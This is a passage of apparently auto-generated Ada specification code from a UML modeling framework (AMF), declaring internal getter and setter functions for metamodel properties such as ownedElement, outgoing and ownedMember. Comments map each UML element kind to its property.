-- LoopNode => StructuredActivityNode::node -- SequenceNode => StructuredActivityNode::node -- StructuredActivityNode => StructuredActivityNode::node function Internal_Get_Non_Navigability_Notation (Self : AMF.Internals.AMF_Element) return AMF.UMLDI.UMLDI_UML_Navigability_Notation_Kind; procedure Internal_Set_Non_Navigability_Notation (Self : AMF.Internals.AMF_Element; To : AMF.UMLDI.UMLDI_UML_Navigability_Notation_Kind); -- UMLClassDiagram => UMLClassOrCompositeStructureDiagram::nonNavigabilityNotation -- UMLCompositeStructureDiagram => UMLClassOrCompositeStructureDiagram::nonNavigabilityNotation function Internal_Get_Object (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Object (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AddStructuralFeatureValueAction => StructuralFeatureAction::object -- ClearAssociationAction => ClearAssociationAction::object -- ClearStructuralFeatureAction => StructuralFeatureAction::object -- ReadIsClassifiedObjectAction => ReadIsClassifiedObjectAction::object -- ReadLinkObjectEndAction => ReadLinkObjectEndAction::object -- ReadLinkObjectEndQualifierAction => ReadLinkObjectEndQualifierAction::object -- ReadStructuralFeatureAction => StructuralFeatureAction::object -- ReclassifyObjectAction => ReclassifyObjectAction::object -- RemoveStructuralFeatureValueAction => StructuralFeatureAction::object -- StartClassifierBehaviorAction => StartClassifierBehaviorAction::object -- StartObjectBehaviorAction => StartObjectBehaviorAction::object -- UnmarshallAction => UnmarshallAction::object function Internal_Get_Observation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Duration => Duration::observation -- TimeExpression => TimeExpression::observation function Internal_Get_Old_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ReclassifyObjectAction => ReclassifyObjectAction::oldClassifier function Internal_Get_On_Port (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_On_Port (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- BroadcastSignalAction => InvocationAction::onPort -- CallBehaviorAction => InvocationAction::onPort -- CallOperationAction => InvocationAction::onPort -- SendObjectAction => InvocationAction::onPort -- SendSignalAction => InvocationAction::onPort -- StartObjectBehaviorAction => InvocationAction::onPort function Internal_Get_Operand (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- CombinedFragment => CombinedFragment::operand -- ConsiderIgnoreFragment => CombinedFragment::operand -- Expression => Expression::operand -- StringExpression => Expression::operand function Internal_Get_Operation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Operation (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- CallEvent => CallEvent::operation -- CallOperationAction => CallOperationAction::operation -- Parameter => Parameter::operation function Internal_Get_Opposite (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Opposite (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionEnd => Property::opposite -- Port => Property::opposite -- Property => Property::opposite function Internal_Get_Ordering (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Object_Node_Ordering_Kind; procedure Internal_Set_Ordering (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Object_Node_Ordering_Kind); -- ActionInputPin => ObjectNode::ordering -- ActivityParameterNode => ObjectNode::ordering -- CentralBufferNode => ObjectNode::ordering -- DataStoreNode => ObjectNode::ordering -- ExpansionNode => ObjectNode::ordering -- InputPin => ObjectNode::ordering -- OutputPin => ObjectNode::ordering -- ValuePin => ObjectNode::ordering function Internal_Get_Outgoing (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => ActivityNode::outgoing -- AcceptEventAction => ActivityNode::outgoing -- ActionInputPin => ActivityNode::outgoing -- ActivityFinalNode => ActivityNode::outgoing -- ActivityParameterNode => ActivityNode::outgoing -- AddStructuralFeatureValueAction => ActivityNode::outgoing -- AddVariableValueAction => ActivityNode::outgoing -- BroadcastSignalAction => ActivityNode::outgoing -- CallBehaviorAction => ActivityNode::outgoing -- CallOperationAction => ActivityNode::outgoing -- CentralBufferNode => ActivityNode::outgoing -- ClearAssociationAction => ActivityNode::outgoing -- ClearStructuralFeatureAction => ActivityNode::outgoing -- ClearVariableAction => ActivityNode::outgoing -- ConditionalNode => ActivityNode::outgoing -- ConnectionPointReference => Vertex::outgoing -- CreateLinkAction => ActivityNode::outgoing -- CreateLinkObjectAction => ActivityNode::outgoing -- CreateObjectAction => ActivityNode::outgoing -- DataStoreNode => ActivityNode::outgoing -- DecisionNode => ActivityNode::outgoing -- DestroyLinkAction => ActivityNode::outgoing -- DestroyObjectAction => ActivityNode::outgoing -- ExpansionNode => ActivityNode::outgoing -- ExpansionRegion => ActivityNode::outgoing -- FinalState => Vertex::outgoing -- FlowFinalNode => ActivityNode::outgoing -- ForkNode => ActivityNode::outgoing -- InitialNode => ActivityNode::outgoing -- InputPin => ActivityNode::outgoing -- JoinNode => ActivityNode::outgoing -- LoopNode => ActivityNode::outgoing -- MergeNode => ActivityNode::outgoing -- OpaqueAction => ActivityNode::outgoing -- OutputPin => ActivityNode::outgoing -- Pseudostate => Vertex::outgoing -- RaiseExceptionAction => ActivityNode::outgoing -- ReadExtentAction => ActivityNode::outgoing -- ReadIsClassifiedObjectAction => ActivityNode::outgoing -- ReadLinkAction => ActivityNode::outgoing -- ReadLinkObjectEndAction => ActivityNode::outgoing -- ReadLinkObjectEndQualifierAction => ActivityNode::outgoing -- ReadSelfAction => ActivityNode::outgoing -- ReadStructuralFeatureAction => ActivityNode::outgoing -- ReadVariableAction => ActivityNode::outgoing -- ReclassifyObjectAction => ActivityNode::outgoing -- ReduceAction => ActivityNode::outgoing -- RemoveStructuralFeatureValueAction => ActivityNode::outgoing -- RemoveVariableValueAction => ActivityNode::outgoing -- ReplyAction => ActivityNode::outgoing -- SendObjectAction => ActivityNode::outgoing -- SendSignalAction => ActivityNode::outgoing -- SequenceNode => ActivityNode::outgoing -- StartClassifierBehaviorAction => ActivityNode::outgoing -- StartObjectBehaviorAction => ActivityNode::outgoing -- State => Vertex::outgoing -- StructuredActivityNode => ActivityNode::outgoing -- TestIdentityAction => ActivityNode::outgoing -- UnmarshallAction => ActivityNode::outgoing -- ValuePin => ActivityNode::outgoing -- ValueSpecificationAction => ActivityNode::outgoing function Internal_Get_Output (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => Action::output -- AcceptEventAction => Action::output -- AddStructuralFeatureValueAction => Action::output -- AddVariableValueAction => Action::output -- BroadcastSignalAction => Action::output -- CallBehaviorAction => Action::output -- CallOperationAction => Action::output -- ClearAssociationAction => Action::output -- ClearStructuralFeatureAction => Action::output -- ClearVariableAction => Action::output -- ConditionalNode => Action::output -- CreateLinkAction => Action::output -- CreateLinkObjectAction => Action::output -- CreateObjectAction => Action::output -- DestroyLinkAction => Action::output -- DestroyObjectAction => Action::output -- ExpansionRegion => Action::output -- LoopNode => Action::output -- OpaqueAction => Action::output -- RaiseExceptionAction => Action::output -- ReadExtentAction => Action::output -- ReadIsClassifiedObjectAction => Action::output -- ReadLinkAction => Action::output -- ReadLinkObjectEndAction => Action::output -- ReadLinkObjectEndQualifierAction => Action::output -- ReadSelfAction => Action::output -- ReadStructuralFeatureAction => Action::output -- ReadVariableAction => Action::output -- ReclassifyObjectAction => Action::output -- ReduceAction => Action::output -- RemoveStructuralFeatureValueAction => Action::output -- RemoveVariableValueAction => Action::output -- ReplyAction => Action::output -- SendObjectAction => Action::output -- SendSignalAction => Action::output -- SequenceNode => Action::output -- StartClassifierBehaviorAction => Action::output -- StartObjectBehaviorAction => Action::output -- StructuredActivityNode => Action::output -- TestIdentityAction => Action::output -- UnmarshallAction => Action::output -- ValueSpecificationAction => Action::output function Internal_Get_Output_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ExpansionRegion => ExpansionRegion::outputElement function Internal_Get_Output_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- OpaqueAction => OpaqueAction::outputValue function Internal_Get_Owned_Actual (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owned_Actual (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TemplateParameterSubstitution => TemplateParameterSubstitution::ownedActual function Internal_Get_Owned_Attribute (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Class::ownedAttribute -- Artifact => Artifact::ownedAttribute -- AssociationClass => Class::ownedAttribute -- Class => Class::ownedAttribute -- Collaboration => StructuredClassifier::ownedAttribute -- Component => Class::ownedAttribute -- DataType => DataType::ownedAttribute -- DeploymentSpecification => Artifact::ownedAttribute -- Device => Class::ownedAttribute -- Enumeration => DataType::ownedAttribute -- ExecutionEnvironment => Class::ownedAttribute -- FunctionBehavior => Class::ownedAttribute -- Interaction => Class::ownedAttribute -- Interface => Interface::ownedAttribute -- Node => Class::ownedAttribute -- OpaqueBehavior => Class::ownedAttribute -- PrimitiveType => DataType::ownedAttribute -- ProtocolStateMachine => Class::ownedAttribute -- Signal => Signal::ownedAttribute -- StateMachine => Class::ownedAttribute -- Stereotype => Class::ownedAttribute function Internal_Get_Owned_Behavior (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => BehavioredClassifier::ownedBehavior -- Actor => BehavioredClassifier::ownedBehavior -- AssociationClass => BehavioredClassifier::ownedBehavior -- Class => BehavioredClassifier::ownedBehavior -- Collaboration => BehavioredClassifier::ownedBehavior -- Component => BehavioredClassifier::ownedBehavior -- Device => BehavioredClassifier::ownedBehavior -- ExecutionEnvironment => BehavioredClassifier::ownedBehavior -- FunctionBehavior => BehavioredClassifier::ownedBehavior -- Interaction => BehavioredClassifier::ownedBehavior -- Node => BehavioredClassifier::ownedBehavior -- OpaqueBehavior => BehavioredClassifier::ownedBehavior -- ProtocolStateMachine => BehavioredClassifier::ownedBehavior -- StateMachine => BehavioredClassifier::ownedBehavior -- Stereotype => BehavioredClassifier::ownedBehavior -- UseCase => BehavioredClassifier::ownedBehavior function Internal_Get_Owned_Comment (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => Element::ownedComment -- AcceptCallAction => Element::ownedComment -- AcceptEventAction => Element::ownedComment -- ActionExecutionSpecification => Element::ownedComment -- ActionInputPin => Element::ownedComment -- Activity => Element::ownedComment -- ActivityFinalNode => Element::ownedComment -- ActivityParameterNode => Element::ownedComment -- ActivityPartition => Element::ownedComment -- Actor => Element::ownedComment -- AddStructuralFeatureValueAction => Element::ownedComment -- AddVariableValueAction => Element::ownedComment -- AnyReceiveEvent => Element::ownedComment -- Artifact => Element::ownedComment -- Association => Element::ownedComment -- AssociationClass => Element::ownedComment -- BehaviorExecutionSpecification => Element::ownedComment -- BroadcastSignalAction => Element::ownedComment -- CallBehaviorAction => Element::ownedComment -- CallEvent => Element::ownedComment -- CallOperationAction => Element::ownedComment -- CentralBufferNode => Element::ownedComment -- ChangeEvent => Element::ownedComment -- Class => Element::ownedComment -- ClassifierTemplateParameter => Element::ownedComment -- Clause => Element::ownedComment -- ClearAssociationAction => Element::ownedComment -- ClearStructuralFeatureAction => Element::ownedComment -- ClearVariableAction => Element::ownedComment -- Collaboration => Element::ownedComment -- CollaborationUse => Element::ownedComment -- CombinedFragment => Element::ownedComment -- Comment => Element::ownedComment -- CommunicationPath => Element::ownedComment -- Component => Element::ownedComment -- ComponentRealization => Element::ownedComment -- ConditionalNode => Element::ownedComment -- ConnectableElementTemplateParameter => Element::ownedComment -- ConnectionPointReference => Element::ownedComment -- Connector => Element::ownedComment -- ConnectorEnd => Element::ownedComment -- ConsiderIgnoreFragment => Element::ownedComment -- Constraint => Element::ownedComment -- Continuation => Element::ownedComment -- ControlFlow => Element::ownedComment -- CreateLinkAction => Element::ownedComment -- CreateLinkObjectAction => Element::ownedComment -- CreateObjectAction => Element::ownedComment -- UMLActivityDiagram => Element::ownedComment -- UMLClassDiagram => Element::ownedComment -- UMLComponentDiagram => Element::ownedComment -- UMLCompositeStructureDiagram => Element::ownedComment -- UMLDeploymentDiagram => Element::ownedComment -- UMLInteractionDiagram => Element::ownedComment -- UMLObjectDiagram => Element::ownedComment -- UMLPackageDiagram => Element::ownedComment -- UMLProfileDiagram => Element::ownedComment -- UMLStateMachineDiagram => Element::ownedComment -- UMLStyle => Element::ownedComment -- UMLUseCaseDiagram => Element::ownedComment -- DataStoreNode => Element::ownedComment -- DataType => Element::ownedComment -- DecisionNode => Element::ownedComment -- Dependency => Element::ownedComment -- Deployment => Element::ownedComment -- DeploymentSpecification => Element::ownedComment -- DestroyLinkAction => Element::ownedComment -- DestroyObjectAction => Element::ownedComment -- DestructionOccurrenceSpecification => Element::ownedComment -- Device => Element::ownedComment -- Duration => Element::ownedComment -- DurationConstraint => Element::ownedComment -- DurationInterval => Element::ownedComment -- DurationObservation => Element::ownedComment -- ElementImport => Element::ownedComment -- Enumeration => Element::ownedComment -- EnumerationLiteral => Element::ownedComment -- ExceptionHandler => Element::ownedComment -- ExecutionEnvironment => Element::ownedComment -- ExecutionOccurrenceSpecification => Element::ownedComment -- ExpansionNode => Element::ownedComment -- ExpansionRegion => Element::ownedComment -- Expression => Element::ownedComment -- Extend => Element::ownedComment -- Extension => Element::ownedComment -- ExtensionEnd => Element::ownedComment -- ExtensionPoint => Element::ownedComment -- FinalState => Element::ownedComment -- FlowFinalNode => Element::ownedComment -- ForkNode => Element::ownedComment -- FunctionBehavior => Element::ownedComment -- Gate => Element::ownedComment -- GeneralOrdering => Element::ownedComment -- Generalization => Element::ownedComment -- GeneralizationSet => Element::ownedComment -- Image => Element::ownedComment -- Include => Element::ownedComment -- InformationFlow => Element::ownedComment -- InformationItem => Element::ownedComment -- InitialNode => Element::ownedComment -- InputPin => Element::ownedComment -- InstanceSpecification => Element::ownedComment -- InstanceValue => Element::ownedComment -- Interaction => Element::ownedComment -- InteractionConstraint => Element::ownedComment -- InteractionOperand => Element::ownedComment -- InteractionUse => Element::ownedComment -- Interface => Element::ownedComment -- InterfaceRealization => Element::ownedComment -- InterruptibleActivityRegion => Element::ownedComment -- Interval => Element::ownedComment -- IntervalConstraint => Element::ownedComment -- JoinNode => Element::ownedComment -- Lifeline => Element::ownedComment -- LinkEndCreationData => Element::ownedComment -- LinkEndData => Element::ownedComment -- LinkEndDestructionData => Element::ownedComment -- LiteralBoolean => Element::ownedComment -- LiteralInteger => Element::ownedComment -- LiteralNull => Element::ownedComment -- LiteralReal => Element::ownedComment -- LiteralString => Element::ownedComment -- LiteralUnlimitedNatural => Element::ownedComment -- LoopNode => Element::ownedComment -- Manifestation => Element::ownedComment -- MergeNode => Element::ownedComment -- Message => Element::ownedComment -- MessageOccurrenceSpecification => Element::ownedComment -- Model => Element::ownedComment -- Node => Element::ownedComment -- ObjectFlow => Element::ownedComment -- OccurrenceSpecification => Element::ownedComment -- OpaqueAction => Element::ownedComment -- OpaqueBehavior => Element::ownedComment -- OpaqueExpression => Element::ownedComment -- Operation => Element::ownedComment -- OperationTemplateParameter => Element::ownedComment -- OutputPin => Element::ownedComment -- Package => Element::ownedComment -- PackageImport => Element::ownedComment -- PackageMerge => Element::ownedComment -- Parameter => Element::ownedComment -- ParameterSet => Element::ownedComment -- PartDecomposition => Element::ownedComment -- Port => Element::ownedComment -- PrimitiveType => Element::ownedComment -- Profile => Element::ownedComment -- ProfileApplication => Element::ownedComment -- Property => Element::ownedComment -- ProtocolConformance => Element::ownedComment -- ProtocolStateMachine => Element::ownedComment -- ProtocolTransition => Element::ownedComment -- Pseudostate => Element::ownedComment -- QualifierValue => Element::ownedComment -- RaiseExceptionAction => Element::ownedComment -- ReadExtentAction => Element::ownedComment -- ReadIsClassifiedObjectAction => Element::ownedComment -- ReadLinkAction => Element::ownedComment -- ReadLinkObjectEndAction => Element::ownedComment -- ReadLinkObjectEndQualifierAction => Element::ownedComment -- ReadSelfAction => Element::ownedComment -- ReadStructuralFeatureAction => Element::ownedComment -- ReadVariableAction => Element::ownedComment -- Realization => Element::ownedComment -- Reception => Element::ownedComment -- ReclassifyObjectAction => Element::ownedComment -- RedefinableTemplateSignature => Element::ownedComment -- ReduceAction => Element::ownedComment -- Region => Element::ownedComment -- RemoveStructuralFeatureValueAction => Element::ownedComment -- RemoveVariableValueAction => Element::ownedComment -- ReplyAction => Element::ownedComment -- SendObjectAction => Element::ownedComment -- SendSignalAction => Element::ownedComment -- SequenceNode => Element::ownedComment -- Signal => Element::ownedComment -- SignalEvent => Element::ownedComment -- Slot => Element::ownedComment -- StartClassifierBehaviorAction => Element::ownedComment -- StartObjectBehaviorAction => Element::ownedComment -- State => Element::ownedComment -- StateInvariant => Element::ownedComment -- StateMachine => Element::ownedComment -- Stereotype => Element::ownedComment -- StringExpression => Element::ownedComment -- StructuredActivityNode => Element::ownedComment -- Substitution => Element::ownedComment -- TemplateBinding => Element::ownedComment -- TemplateParameter => Element::ownedComment -- TemplateParameterSubstitution => Element::ownedComment -- TemplateSignature => Element::ownedComment -- TestIdentityAction => Element::ownedComment -- TimeConstraint => Element::ownedComment -- TimeEvent => Element::ownedComment -- TimeExpression => Element::ownedComment -- TimeInterval => Element::ownedComment -- TimeObservation => Element::ownedComment -- Transition => Element::ownedComment -- Trigger => Element::ownedComment -- UnmarshallAction => Element::ownedComment -- Usage => Element::ownedComment -- UseCase => Element::ownedComment -- ValuePin => Element::ownedComment -- ValueSpecificationAction => Element::ownedComment -- Variable => Element::ownedComment function Internal_Get_Owned_Connector (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => StructuredClassifier::ownedConnector -- AssociationClass => StructuredClassifier::ownedConnector -- Class => StructuredClassifier::ownedConnector -- Collaboration => StructuredClassifier::ownedConnector -- Component => StructuredClassifier::ownedConnector -- Device => StructuredClassifier::ownedConnector -- ExecutionEnvironment => StructuredClassifier::ownedConnector -- FunctionBehavior => StructuredClassifier::ownedConnector -- Interaction => StructuredClassifier::ownedConnector -- Node => StructuredClassifier::ownedConnector -- OpaqueBehavior => StructuredClassifier::ownedConnector -- ProtocolStateMachine => StructuredClassifier::ownedConnector -- StateMachine => StructuredClassifier::ownedConnector -- Stereotype => StructuredClassifier::ownedConnector function Internal_Get_Owned_Default (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owned_Default (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ClassifierTemplateParameter => TemplateParameter::ownedDefault -- ConnectableElementTemplateParameter => TemplateParameter::ownedDefault -- OperationTemplateParameter => TemplateParameter::ownedDefault -- TemplateParameter => TemplateParameter::ownedDefault function Internal_Get_Owned_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => Element::ownedElement -- AcceptCallAction => Element::ownedElement -- AcceptEventAction => Element::ownedElement -- ActionExecutionSpecification => Element::ownedElement -- ActionInputPin => Element::ownedElement -- Activity => Element::ownedElement -- ActivityFinalNode => Element::ownedElement -- ActivityParameterNode => Element::ownedElement -- ActivityPartition => Element::ownedElement -- Actor => Element::ownedElement -- AddStructuralFeatureValueAction => Element::ownedElement -- AddVariableValueAction => Element::ownedElement -- AnyReceiveEvent => Element::ownedElement -- Artifact => Element::ownedElement -- Association => Element::ownedElement -- AssociationClass => Element::ownedElement -- BehaviorExecutionSpecification => Element::ownedElement -- BroadcastSignalAction => Element::ownedElement -- CallBehaviorAction => Element::ownedElement -- CallEvent => Element::ownedElement -- CallOperationAction => Element::ownedElement -- CentralBufferNode => Element::ownedElement -- ChangeEvent => Element::ownedElement -- Class => Element::ownedElement -- ClassifierTemplateParameter => Element::ownedElement -- Clause => Element::ownedElement -- ClearAssociationAction => Element::ownedElement -- ClearStructuralFeatureAction => Element::ownedElement -- ClearVariableAction => Element::ownedElement -- Collaboration => Element::ownedElement -- CollaborationUse => Element::ownedElement -- CombinedFragment => Element::ownedElement -- Comment => Element::ownedElement -- CommunicationPath => Element::ownedElement -- Component => Element::ownedElement -- ComponentRealization => Element::ownedElement -- ConditionalNode => Element::ownedElement -- ConnectableElementTemplateParameter => Element::ownedElement -- ConnectionPointReference => Element::ownedElement -- Connector => Element::ownedElement -- ConnectorEnd => Element::ownedElement -- ConsiderIgnoreFragment => Element::ownedElement -- Constraint => Element::ownedElement -- Continuation => Element::ownedElement -- ControlFlow => Element::ownedElement -- CreateLinkAction => Element::ownedElement -- CreateLinkObjectAction => Element::ownedElement -- CreateObjectAction => Element::ownedElement -- UMLActivityDiagram => Element::ownedElement -- UMLAssociationEndLabel => UMLDiagramElement::ownedElement -- UMLAssociationOrConnectorOrLinkShape => UMLDiagramElement::ownedElement -- UMLClassDiagram => Element::ownedElement -- UMLClassifierShape => UMLDiagramElement::ownedElement -- UMLCompartment => UMLDiagramElement::ownedElement -- UMLCompartmentableShape => UMLDiagramElement::ownedElement -- UMLComponentDiagram => Element::ownedElement -- UMLCompositeStructureDiagram => Element::ownedElement -- UMLDeploymentDiagram => Element::ownedElement -- UMLEdge => UMLDiagramElement::ownedElement -- UMLInteractionDiagram => Element::ownedElement -- UMLInteractionTableLabel => UMLDiagramElement::ownedElement -- UMLKeywordLabel => UMLDiagramElement::ownedElement -- UMLLabel => UMLDiagramElement::ownedElement -- UMLMultiplicityLabel => UMLDiagramElement::ownedElement -- UMLNameLabel => UMLDiagramElement::ownedElement -- UMLObjectDiagram => Element::ownedElement -- UMLPackageDiagram => Element::ownedElement -- UMLProfileDiagram => Element::ownedElement -- UMLRedefinesLabel => UMLDiagramElement::ownedElement -- UMLShape => UMLDiagramElement::ownedElement -- UMLStateMachineDiagram => Element::ownedElement -- UMLStateShape => UMLDiagramElement::ownedElement -- UMLStereotypePropertyValueLabel => UMLDiagramElement::ownedElement -- UMLStyle => Element::ownedElement -- UMLTypedElementLabel => UMLDiagramElement::ownedElement -- UMLUseCaseDiagram => Element::ownedElement -- DataStoreNode => Element::ownedElement -- DataType => Element::ownedElement -- DecisionNode => Element::ownedElement -- Dependency => Element::ownedElement -- Deployment => Element::ownedElement -- DeploymentSpecification => Element::ownedElement -- DestroyLinkAction => Element::ownedElement -- DestroyObjectAction => Element::ownedElement -- DestructionOccurrenceSpecification => Element::ownedElement -- Device => Element::ownedElement -- Duration => Element::ownedElement -- DurationConstraint => Element::ownedElement -- DurationInterval => Element::ownedElement -- DurationObservation => Element::ownedElement -- ElementImport => Element::ownedElement -- Enumeration => Element::ownedElement -- EnumerationLiteral => Element::ownedElement -- ExceptionHandler => Element::ownedElement -- ExecutionEnvironment => Element::ownedElement -- ExecutionOccurrenceSpecification => Element::ownedElement -- ExpansionNode => Element::ownedElement -- ExpansionRegion => Element::ownedElement -- Expression => Element::ownedElement -- Extend => Element::ownedElement -- Extension => Element::ownedElement -- ExtensionEnd => Element::ownedElement -- ExtensionPoint => Element::ownedElement -- FinalState => Element::ownedElement -- FlowFinalNode => Element::ownedElement -- ForkNode => Element::ownedElement -- FunctionBehavior => Element::ownedElement -- Gate => Element::ownedElement -- GeneralOrdering => Element::ownedElement -- Generalization => Element::ownedElement -- GeneralizationSet => Element::ownedElement -- Image => Element::ownedElement -- Include => Element::ownedElement -- InformationFlow => Element::ownedElement -- InformationItem => Element::ownedElement -- InitialNode => Element::ownedElement -- InputPin => Element::ownedElement -- InstanceSpecification => Element::ownedElement -- InstanceValue => Element::ownedElement -- Interaction => Element::ownedElement -- InteractionConstraint => Element::ownedElement -- InteractionOperand => Element::ownedElement -- InteractionUse => Element::ownedElement -- Interface => Element::ownedElement -- InterfaceRealization => Element::ownedElement -- InterruptibleActivityRegion => Element::ownedElement -- Interval => Element::ownedElement -- IntervalConstraint => Element::ownedElement -- JoinNode => Element::ownedElement -- Lifeline => Element::ownedElement -- LinkEndCreationData => Element::ownedElement -- LinkEndData => Element::ownedElement -- LinkEndDestructionData => Element::ownedElement -- LiteralBoolean => Element::ownedElement -- LiteralInteger => Element::ownedElement -- LiteralNull => Element::ownedElement -- LiteralReal => Element::ownedElement -- LiteralString => Element::ownedElement -- LiteralUnlimitedNatural => Element::ownedElement -- LoopNode => Element::ownedElement -- Manifestation => Element::ownedElement -- MergeNode => Element::ownedElement -- Message => Element::ownedElement -- MessageOccurrenceSpecification => Element::ownedElement -- Model => Element::ownedElement -- Node => Element::ownedElement -- ObjectFlow => Element::ownedElement -- OccurrenceSpecification => Element::ownedElement -- OpaqueAction => Element::ownedElement -- OpaqueBehavior => Element::ownedElement -- OpaqueExpression => Element::ownedElement -- Operation => Element::ownedElement -- OperationTemplateParameter => Element::ownedElement -- OutputPin => Element::ownedElement -- Package => Element::ownedElement -- PackageImport => Element::ownedElement -- PackageMerge => Element::ownedElement -- Parameter => Element::ownedElement -- ParameterSet => Element::ownedElement -- PartDecomposition => Element::ownedElement -- Port => Element::ownedElement -- PrimitiveType => Element::ownedElement -- Profile => Element::ownedElement -- ProfileApplication => Element::ownedElement -- Property => Element::ownedElement -- ProtocolConformance => Element::ownedElement -- ProtocolStateMachine => Element::ownedElement -- ProtocolTransition => Element::ownedElement -- Pseudostate => Element::ownedElement -- QualifierValue => Element::ownedElement -- RaiseExceptionAction => Element::ownedElement -- ReadExtentAction => Element::ownedElement -- ReadIsClassifiedObjectAction => Element::ownedElement -- ReadLinkAction => Element::ownedElement -- ReadLinkObjectEndAction => Element::ownedElement -- ReadLinkObjectEndQualifierAction => Element::ownedElement -- ReadSelfAction => Element::ownedElement -- ReadStructuralFeatureAction => Element::ownedElement -- ReadVariableAction => Element::ownedElement -- Realization => Element::ownedElement -- Reception => Element::ownedElement -- ReclassifyObjectAction => Element::ownedElement -- RedefinableTemplateSignature => Element::ownedElement -- ReduceAction => Element::ownedElement -- Region => Element::ownedElement -- RemoveStructuralFeatureValueAction => Element::ownedElement -- RemoveVariableValueAction => Element::ownedElement -- ReplyAction => Element::ownedElement -- SendObjectAction => Element::ownedElement -- SendSignalAction => Element::ownedElement -- SequenceNode => Element::ownedElement -- Signal => Element::ownedElement -- SignalEvent => Element::ownedElement -- Slot => Element::ownedElement -- StartClassifierBehaviorAction => Element::ownedElement -- StartObjectBehaviorAction => Element::ownedElement -- State => Element::ownedElement -- StateInvariant => Element::ownedElement -- StateMachine => Element::ownedElement -- Stereotype => Element::ownedElement -- StringExpression => Element::ownedElement -- StructuredActivityNode => Element::ownedElement -- Substitution => Element::ownedElement -- TemplateBinding => Element::ownedElement -- TemplateParameter => Element::ownedElement -- TemplateParameterSubstitution => Element::ownedElement -- TemplateSignature => Element::ownedElement -- TestIdentityAction => Element::ownedElement -- TimeConstraint => Element::ownedElement -- TimeEvent => Element::ownedElement -- TimeExpression => Element::ownedElement -- TimeInterval => Element::ownedElement -- TimeObservation => Element::ownedElement -- Transition => Element::ownedElement -- Trigger => Element::ownedElement -- UnmarshallAction => Element::ownedElement -- Usage => Element::ownedElement -- UseCase => Element::ownedElement -- ValuePin => Element::ownedElement -- ValueSpecificationAction => Element::ownedElement -- Variable => Element::ownedElement function Internal_Get_Owned_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Association => Association::ownedEnd -- AssociationClass => Association::ownedEnd -- CommunicationPath => Association::ownedEnd -- Extension => Association::ownedEnd function Internal_Get_Owned_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owned_End (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Extension => Extension::ownedEnd function Internal_Get_Owned_Literal (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Enumeration => Enumeration::ownedLiteral function Internal_Get_Owned_Member (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Namespace::ownedMember -- Actor => Namespace::ownedMember -- Artifact => Namespace::ownedMember -- Association => Namespace::ownedMember -- AssociationClass => Namespace::ownedMember -- Class => Namespace::ownedMember -- Collaboration => Namespace::ownedMember -- CommunicationPath => Namespace::ownedMember -- Component => Namespace::ownedMember -- ConditionalNode => Namespace::ownedMember -- DataType => Namespace::ownedMember -- DeploymentSpecification => Namespace::ownedMember -- Device => Namespace::ownedMember -- Enumeration => Namespace::ownedMember -- ExecutionEnvironment => Namespace::ownedMember -- ExpansionRegion => Namespace::ownedMember -- Extension => Namespace::ownedMember -- FinalState => Namespace::ownedMember -- FunctionBehavior => Namespace::ownedMember -- InformationItem => Namespace::ownedMember -- Interaction => Namespace::ownedMember -- InteractionOperand => Namespace::ownedMember -- Interface => Namespace::ownedMember -- LoopNode => Namespace::ownedMember -- Model => Namespace::ownedMember -- Node => Namespace::ownedMember -- OpaqueBehavior => Namespace::ownedMember -- Operation => Namespace::ownedMember -- Package => Namespace::ownedMember -- PrimitiveType => Namespace::ownedMember -- Profile => Namespace::ownedMember -- ProtocolStateMachine => Namespace::ownedMember -- ProtocolTransition => Namespace::ownedMember -- Reception => Namespace::ownedMember -- Region => Namespace::ownedMember -- SequenceNode => Namespace::ownedMember -- Signal => Namespace::ownedMember -- State => Namespace::ownedMember -- StateMachine => Namespace::ownedMember -- Stereotype => Namespace::ownedMember -- StructuredActivityNode => Namespace::ownedMember -- Transition => Namespace::ownedMember -- UseCase => Namespace::ownedMember function Internal_Get_Owned_Operation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Class::ownedOperation -- Artifact => Artifact::ownedOperation -- AssociationClass => Class::ownedOperation -- Class => Class::ownedOperation -- Component => Class::ownedOperation 